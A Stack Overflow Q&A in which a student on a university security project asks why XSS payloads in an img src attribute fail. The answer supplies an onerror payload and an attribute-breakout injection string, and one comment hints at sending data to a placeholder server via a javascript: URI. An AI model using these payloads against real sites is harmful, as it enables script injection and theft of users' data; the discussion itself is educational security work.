1

I have to do an XSS-Attack for a security related university project. I want to store an image that has malicious code inside its source attribute. However, it seems to be that I don't have access to any javascript objects from the the src attribute.

Here are some things I tried:

<img src="j&#X41vascript:alert('XSS')">

Throws: Reference Error alert is not defined.

<img src="j&#X41vascript:window.alert('XSS')">

Throws: Reference Error window is not defined

<img src="j&#X41vascript:var x = new XMLHttpRequest();">

Throws: Reference Error XMLHttpRequest is not defined

What is the problem here, and how can I access the main window of the site and the objects I want to access?

EDIT: Onerror and all the other events are filtered.

Improve this question
5
  • This comment is not really helpfull. why is it not executed? And the error implies that it is executed. Commented Nov 25, 2014 at 12:26
  • Can you do something like javascript:'http//yourserver.example?js='+Object (and look what is arriving at yourserver)? Commented Nov 25, 2014 at 12:29
  • Not all browsers are vulnerable to this attack. What browser are you targeting/testing -stackoverflow.com/questions/1798633/… Commented Nov 25, 2014 at 12:30
  • I'm testing on Firefox. Commented Nov 25, 2014 at 12:32
  • There is no way to execute Javascript codes through src attribute of img. ( I assume that quotes are encoded ) . Also have you read this ? stackoverflow.com/questions/1798633/… Commented Nov 25, 2014 at 12:33

1 Answer 1

Reset to default
2

The src isn't executed, so that won't work.

A solution would be to use onerror :

<img src="wrong" onerror="alert('XSS')">

Depending on how your src attribute is injected, you may be able to pass this value : 

wrong" onerror="alert('XSS')

But no decent framework is vulnerable to that kind of attack.

Improve this answer
Sign up to request clarification or add additional context in comments.

2 Comments

Actually, the javascript pseudo protocol denotes anything following is interpreted as JavaScript.
@Gumbo On the src attribute with a not super old browser ? I don't think so.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.